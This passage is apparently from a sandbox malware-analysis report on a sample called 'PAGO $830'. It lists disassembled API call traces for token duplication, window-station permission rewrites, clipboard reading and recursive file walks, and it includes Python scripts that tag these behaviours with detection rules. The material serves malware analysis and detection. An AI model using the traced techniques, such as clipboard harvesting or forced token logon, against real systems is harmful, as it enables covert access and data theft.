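• LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00DD11CA
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00DD11EC
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00DD1215
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00DD1254
Strings
Similarity
• String ID: $default$winsta0
APIs
  • Part of subcall function 00DD103D: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DD1058
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DD0B10
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DD0BB1
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DD0C50
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DD0C62
Memory Dump Source
"""

# One bullet per call: "Api.MODULE(args), ref: ADDR" or "Api.MODULE ref: ADDR".
API_LINE = re.compile(
    r"^\s*•\s+(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?.*?ref:\s*(?P<ref>[0-9A-Fa-f]+)")
SUBCALL_LINE = re.compile(
    r"^\s*•\s+Part of subcall function (?P<fn>[0-9A-Fa-f]+):\s+"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)")
STRING_ID = re.compile(r"^\s*•\s+String ID:\s*(?P<s>.*)$")
OPCODE_ID = re.compile(r"^\s*•\s+Opcode ID:\s*(?P<id>[0-9a-f]{64})")

# Signature labels and the API sets that must all be present (own heuristics).
SIG_FORCE_FOREGROUND = "forced foreground window: AttachThreadInput + synthetic Alt via keybd_event"
SIG_RUNAS_WINSTA = "logon as another user + winsta0/default desktop access (RunAs-style)"
SIG_WINSTA_DACL = "DACL rewrite on a window-station/desktop object"
SIGNATURES = {
    SIG_FORCE_FOREGROUND: {"AttachThreadInput", "SetForegroundWindow", "keybd_event"},
    SIG_RUNAS_WINSTA: {"LogonUserW", "DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW"},
    SIG_WINSTA_DACL: {"GetUserObjectSecurity", "AddAce",
                      "SetSecurityDescriptorDacl", "SetUserObjectSecurity"},
}

@dataclass
class FunctionRecord:
    direct: list = field(default_factory=list)    # (api, module, args, ref)
    subcalls: list = field(default_factory=list)  # (callee_fn, api, module)
    string_id: str = ""
    opcode_id: str = ""

    def api_names(self):
        return {a for a, _, _, _ in self.direct} | {a for _, a, _ in self.subcalls}

def parse_report(text):
    """Split the listing at each 'APIs' header and collect one record per function."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        if (m := SUBCALL_LINE.match(line)):       # subcall bullets first: they also contain 'Api.MOD'
            cur.subcalls.append((m["fn"], m["api"], m["mod"]))
        elif (m := API_LINE.match(line)):
            cur.direct.append((m["api"], m["mod"], m["args"], m["ref"]))
        elif (m := STRING_ID.match(line)):
            cur.string_id = m["s"].strip()
        elif (m := OPCODE_ID.match(line)):
            cur.opcode_id = m["id"]
    return records

def match_signatures(record):
    names = record.api_names()
    return [label for label, needed in SIGNATURES.items() if needed <= names]

def synthetic_keys(record):
    """Virtual-key codes passed as the first argument of keybd_event (0x12 is VK_MENU, Alt)."""
    keys = set()
    for api, _, args, _ in record.direct:
        if api == "keybd_event" and args:
            first = args.split(",")[0]
            if re.fullmatch(r"[0-9A-Fa-f]+", first):
                keys.add(int(first, 16))
    return keys

if __name__ == "__main__":
    for i, rec in enumerate(parse_report(SAMPLE_REPORT)):
        print(i, rec.string_id or "-", match_signatures(rec), synthetic_keys(rec))
```

The first record resolves to the foreground-forcing signature and a synthetic key set of {0x12}: MapVirtualKeyW(0x12) and keybd_event(0x12, ...) press and release VK_MENU (Alt), which together with AttachThreadInput is the standard way to get past the SetForegroundWindow restriction. In the second record DuplicateTokenEx is called with ImpersonationLevel 2 (SecurityImpersonation) and TokenType 1 (TokenPrimary), i.e. a primary token usable for a process start, and the window station and desktop names "winsta0" and "default" come straight from the String ID.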
                                                          APIs
                                                            • Part of subcall function 00DD103D: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DD1058
                                                            • Part of subcall function 00DD103D: GetLastError.KERNEL32(?,00000000,00000000,?,?,00DD0ADF,?,?,?), ref: 00DD1064
                                                            • Part of subcall function 00DD103D: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DD0ADF,?,?,?), ref: 00DD1073
                                                            • Part of subcall function 00DD103D: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DD0ADF,?,?,?), ref: 00DD107A
                                                            • Part of subcall function 00DD103D: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DD1091
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DD0B10
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DD0B44
                                                          • GetLengthSid.ADVAPI32(?), ref: 00DD0B5B
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00DD0B95
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DD0BB1
                                                          • GetLengthSid.ADVAPI32(?), ref: 00DD0BC8
                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00DD0BD0
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00DD0BD7
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DD0BF8
                                                          • CopySid.ADVAPI32(00000000), ref: 00DD0BFF
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DD0C2E
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DD0C50
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DD0C62
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0C89
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD0C90
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0C99
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD0CA0
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0CA9
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD0CB0
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00DD0CBC
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD0CC3
                                                            • Part of subcall function 00DD10D7: GetProcessHeap.KERNEL32(00000008,00DD0AF5,?,00000000,?,00DD0AF5,?), ref: 00DD10E5
                                                            • Part of subcall function 00DD10D7: HeapAlloc.KERNEL32(00000000,?,00000000,?,00DD0AF5,?), ref: 00DD10EC
                                                            • Part of subcall function 00DD10D7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00DD0AF5,?), ref: 00DD10FB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                          • String ID:
                                                          • API String ID: 4175595110-0
                                                          • Opcode ID: a7f9334530995c963768f7cfa647bf5e0fc39d6a095ba25edbd3b0a21f7132e2
                                                          • Instruction ID: e90376b128ffc469a2097483cacab266a6355fdeaf09c6ad0140b4a340cdd607
                                                          • Opcode Fuzzy Hash: a7f9334530995c963768f7cfa647bf5e0fc39d6a095ba25edbd3b0a21f7132e2
                                                          • Instruction Fuzzy Hash: F9713B72900209BFDF109FA9DC48FAEBBB8FF84350F184216E915B6291D7719989CB70
                                                          APIs
                                                          • OpenClipboard.USER32(00E0D0D0), ref: 00DEEA50
                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00DEEA5E
                                                          • GetClipboardData.USER32(0000000D), ref: 00DEEA6A
                                                          • CloseClipboard.USER32 ref: 00DEEA76
                                                          • GlobalLock.KERNEL32(00000000), ref: 00DEEAAE
                                                          • CloseClipboard.USER32 ref: 00DEEAB8
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00DEEAE3
                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00DEEAF0
                                                          • GetClipboardData.USER32(00000001), ref: 00DEEAF8
                                                          • GlobalLock.KERNEL32(00000000), ref: 00DEEB09
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00DEEB49
                                                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 00DEEB5F
                                                          • GetClipboardData.USER32(0000000F), ref: 00DEEB6B
                                                          • GlobalLock.KERNEL32(00000000), ref: 00DEEB7C
                                                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00DEEB9E
                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DEEBBB
                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DEEBF9
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00DEEC1A
                                                          • CountClipboardFormats.USER32 ref: 00DEEC3B
                                                          • CloseClipboard.USER32 ref: 00DEEC80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                          • String ID:
                                                          • API String ID: 420908878-0
                                                          • Opcode ID: cdb19343cbe5e3a3032cf52e71eb4c103dda13d7e9a6a149186c9a981034da42
                                                          • Instruction ID: db487c5fd342268f4347ddfae04b4a0a3a7f177f694f8c1957fbac59712cee36
                                                          • Opcode Fuzzy Hash: cdb19343cbe5e3a3032cf52e71eb4c103dda13d7e9a6a149186c9a981034da42
                                                          • Instruction Fuzzy Hash: 0E61A0302043419FD310EF66D895F2A77A4FF84708F28865DF49A972A2DB72D949CB72
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00DE68DC
                                                          • FindClose.KERNEL32(00000000), ref: 00DE6930
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DE696C
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DE6993
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DE69D0
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DE69FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                          • API String ID: 3830820486-3289030164
                                                          • Opcode ID: b82a9002ff8aa488c2ff0f8641af6905c108e5dabe10a2334da24d7cababe5b0
                                                          • Instruction ID: 8d25c3938c1b2d174187a8319b17774c43341d1c0bb20b755fa5c56927bd0d53
                                                          • Opcode Fuzzy Hash: b82a9002ff8aa488c2ff0f8641af6905c108e5dabe10a2334da24d7cababe5b0
                                                          • Instruction Fuzzy Hash: F4D15F72508340AEC310EFA5C885EABB7ECEF88714F44491EF589D6191EB75DA48CB72
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00DE9581
                                                          • GetFileAttributesW.KERNEL32(?), ref: 00DE95BF
                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00DE95D9
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00DE95F1
                                                          • FindClose.KERNEL32(00000000), ref: 00DE95FC
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00DE9618
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE9668
                                                          • SetCurrentDirectoryW.KERNEL32(00E36B80), ref: 00DE9686
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DE9690
                                                          • FindClose.KERNEL32(00000000), ref: 00DE969D
                                                          • FindClose.KERNEL32(00000000), ref: 00DE96AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                          • String ID: *.*
                                                          • API String ID: 1409584000-438819550
                                                          • Opcode ID: 902237dba29dc71d407bc972d14c150184ab73652f549a2ee214c71e6ab5fff5
                                                          • Instruction ID: 0f78945fb5789d427dedb05d0118e742484179c5f8051cfddfa6de781f06d8d1
                                                          • Opcode Fuzzy Hash: 902237dba29dc71d407bc972d14c150184ab73652f549a2ee214c71e6ab5fff5
                                                          • Instruction Fuzzy Hash: 3731B2316027596EDB20BBB6EC58ADEB7AC9F45320F244166E854F20A0EB75D9858B30
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                          • API String ID: 0-4052911093
                                                          • Opcode ID: 924ebc77a80b3562ddc900cfb195366dfe38b6b0a54c5808ae99e6e58e4e84aa
                                                          • Instruction ID: 5959f4dddb02a5109b7b69dda053bd89908a51e39d59935781bf33ac576cb188
                                                          • Opcode Fuzzy Hash: 924ebc77a80b3562ddc900cfb195366dfe38b6b0a54c5808ae99e6e58e4e84aa
                                                          • Instruction Fuzzy Hash: 13727071E0021A9BDB24DF59C881FBEB7B5EF84310F14816AE445EB295EB709D81DFA0
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00DE96DC
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00DE9737
                                                          • FindClose.KERNEL32(00000000), ref: 00DE9742
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00DE975E
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE97AE
                                                          • SetCurrentDirectoryW.KERNEL32(00E36B80), ref: 00DE97CC
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DE97D6
                                                          • FindClose.KERNEL32(00000000), ref: 00DE97E3
                                                          • FindClose.KERNEL32(00000000), ref: 00DE97F3
                                                            • Part of subcall function 00DDDA03: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00DDDA1E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                          • String ID: *.*
                                                          • API String ID: 2640511053-438819550
                                                          • Opcode ID: c4e929551c85308a94506fea983b567751844d59e4b86299ea83ab368f390267
                                                          • Instruction ID: 8db97238fc3048f1de2bac552447dd1974b84fd44aafca416249b605d4b7ed8f
                                                          • Opcode Fuzzy Hash: c4e929551c85308a94506fea983b567751844d59e4b86299ea83ab368f390267
                                                          • Instruction Fuzzy Hash: 5131B2316027596ECF10BFB6EC58ADEB7AC9F05360F244165E850B21A1DB71DE89CB70
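The "APIs" fields above are flat call traces: one Win32 import per line, the module it resolves to, the argument values the disassembler could recover ("?" where it could not), and the address of the call site. Three of the traces in this section are worth pattern-matching by hand: the ADVAPI32 sequence that rewrites a DACL and applies it with SetUserObjectSecurity(…, 00000004, …), where 4 is DACL_SECURITY_INFORMATION; the clipboard reader that probes formats 0000000D, 00000001 and 0000000F (CF_UNICODETEXT, CF_TEXT and CF_HDROP, the last one unpacked with DragQueryFileW); and the two FindFirstFileW(*.*) loops that descend with SetCurrentDirectoryW. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses trace lines in exactly this format, decodes the documented constant values, and tags each function block with the behaviour it exhibits. The sample input is constructed from lines copied off this page; the function names, rule names and the finding strings are my own choices.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: call-trace lines copied from the "APIs" fields of this
# report, grouped the way the report groups them (one "APIs" heading per function).
SAMPLE_TRACE = """\
APIs
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DD0B10
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DD0BB1
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DD0C50
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DD0C62
• Part of subcall function 00DD10D7: GetProcessHeap.KERNEL32(00000008,00DD0AF5,?,00000000,?,00DD0AF5,?), ref: 00DD10E5
APIs
• OpenClipboard.USER32(00E0D0D0), ref: 00DEEA50
• IsClipboardFormatAvailable.USER32(0000000D), ref: 00DEEA5E
• GetClipboardData.USER32(0000000D), ref: 00DEEA6A
• IsClipboardFormatAvailable.USER32(0000000F), ref: 00DEEB5F
• GetClipboardData.USER32(0000000F), ref: 00DEEB6B
• DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00DEEB9E
• CloseClipboard.USER32 ref: 00DEEC80
APIs
• FindFirstFileW.KERNEL32(*.*,?), ref: 00DE9618
• SetCurrentDirectoryW.KERNEL32(?), ref: 00DE9668
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00DE9690
• FindClose.KERNEL32(00000000), ref: 00DE969D
"""

# One trace line: optional bullet, optional "Part of subcall function X:" prefix,
# Api.MODULE, optional "(args)", optional comma, then "ref: <call site>".
CALL_RE = re.compile(
    r"^(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Documented Win32 values (winuser.h / winnt.h).
CLIPBOARD_FORMATS = {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT", 0xF: "CF_HDROP"}
SECURITY_INFORMATION = {0x1: "OWNER", 0x2: "GROUP", 0x4: "DACL", 0x8: "SACL"}


@dataclass
class Call:
    api: str
    module: str
    args: List[str]   # raw tokens: hex, "?" (unresolved) or a literal such as *.*
    ref: int          # call-site address


def parse_trace(text: str) -> List[List[Call]]:
    """Split the report text into per-function call lists; metadata lines are skipped."""
    blocks: List[List[Call]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            blocks.append([])
            continue
        m = CALL_RE.match(line)
        if not m:
            continue
        if not blocks:
            blocks.append([])
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        blocks[-1].append(Call(m["api"], m["module"], args, int(m["ref"], 16)))
    return blocks


def arg_int(call: Call, index: int) -> Optional[int]:
    """Numeric value of an argument, or None if it is "?" or a non-hex literal."""
    if index >= len(call.args):
        return None
    tok = call.args[index]
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{1,8}", tok) else None


def analyze_block(block: List[Call]) -> List[str]:
    """Tag one function's trace with the behaviours recognisable from it."""
    apis = {c.api for c in block}
    findings: List[str] = []

    # Clipboard harvesting: which formats are actually pulled, not merely probed.
    if "OpenClipboard" in apis and "GetClipboardData" in apis:
        fmts = []
        for c in block:
            if c.api == "GetClipboardData":
                v = arg_int(c, 0)
                fmts.append(CLIPBOARD_FORMATS.get(v, "?" if v is None else f"0x{v:X}"))
        findings.append("clipboard read: " + ", ".join(fmts))

    # DACL rewrite on a user object (window station / desktop): the second
    # argument of SetUserObjectSecurity is the SECURITY_INFORMATION mask.
    for c in block:
        if c.api == "SetUserObjectSecurity":
            si = arg_int(c, 1)
            parts = [n for bit, n in SECURITY_INFORMATION.items() if si is not None and si & bit]
            if "DACL" in parts and "AddAce" in apis:
                findings.append("user-object DACL rewrite (SetUserObjectSecurity " + "|".join(parts) + ")")

    # Recursive enumeration: FindFirstFileW("*.*") plus chdir into each hit.
    if (any(c.api == "FindFirstFileW" and "*.*" in c.args for c in block)
            and "SetCurrentDirectoryW" in apis and "FindNextFileW" in apis):
        findings.append("recursive directory walk (FindFirstFileW *.* + SetCurrentDirectoryW)")
    return findings


def analyze(text: str) -> Dict[int, List[str]]:
    """Map block index -> findings, for blocks that produced any."""
    result: Dict[int, List[str]] = {}
    for i, block in enumerate(parse_trace(text)):
        tags = analyze_block(block)
        if tags:
            result[i] = tags
    return result


if __name__ == "__main__":
    for i, tags in analyze(SAMPLE_TRACE).items():
        print(f"function block {i}: " + "; ".join(tags))
```

Two caveats when applying this to the rest of the report: "?" means the disassembler could not resolve the argument, so rules that key on a constant (the CF_* format, the SECURITY_INFORMATION mask) silently miss calls whose value is computed at run time; and "Part of subcall function" lines carry the caller's stack context in their argument list (note the caller address 00DD0AF5 appearing twice in the GetProcessHeap arguments above), so positional decoding of those lines is unreliable and the script only uses them for API-name membership.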
                                                          APIs
                                                          • _free.LIBCMT ref: 00DAB974
                                                          • _free.LIBCMT ref: 00DAB998
                                                          • _free.LIBCMT ref: 00DABB1F
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00E13720), ref: 00DABB31
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00E4121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00DABBA9
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00E41270,000000FF,?,0000003F,00000000,?), ref: 00DABBD6
                                                          • _free.LIBCMT ref: 00DABCEB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                          • String ID: 7$ 7
                                                          • API String ID: 314583886-2298233292
                                                          • Opcode ID: b3fbc6ff9283a369885823f47e8d71d7ac78546e8ee6390f1628b19b724e261c
                                                          • Instruction ID: fa1464907f21c0bcce238ae127c88f20d46864057a14adf816f1a050d665b637
                                                          • Opcode Fuzzy Hash: b3fbc6ff9283a369885823f47e8d71d7ac78546e8ee6390f1628b19b724e261c
                                                          • Instruction Fuzzy Hash: 33C105719002459FDB209F799841BAA7BA9EF43330F18419BE495E7253EB708E83CB74
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?), ref: 00DE8175
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DE8185
                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DE8191
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DE822E
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE8242
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE8274
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DE82AA
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE82B3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectoryTime$File$Local$System
                                                          • String ID: *.*
                                                          • API String ID: 1464919966-438819550
                                                          • Opcode ID: 4270a2a00133ef131fce80a21db40ea2e0727e4fa138fc0f160177a116c25ca5
                                                          • Instruction ID: 0d6a429443690be9dc9f23cb34b6dbce1c0176ff998f4ed0b72529a430ffc49b
                                                          • Opcode Fuzzy Hash: 4270a2a00133ef131fce80a21db40ea2e0727e4fa138fc0f160177a116c25ca5
                                                          • Instruction Fuzzy Hash: 09616A72504745AFCB10EF61C8449AEB3E8FF89310F04892EF98997251EB31E945CBB2
                                                          APIs
                                                            • Part of subcall function 00D7592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D75922,?,?,00D748AA,?,?,?,00000000), ref: 00D7594D
                                                            • Part of subcall function 00DDE0B7: GetFileAttributesW.KERNEL32(?,00DDCEB3), ref: 00DDE0B8
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00DDD040
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00DDD0FB
                                                          • MoveFileW.KERNEL32(?,?), ref: 00DDD10E
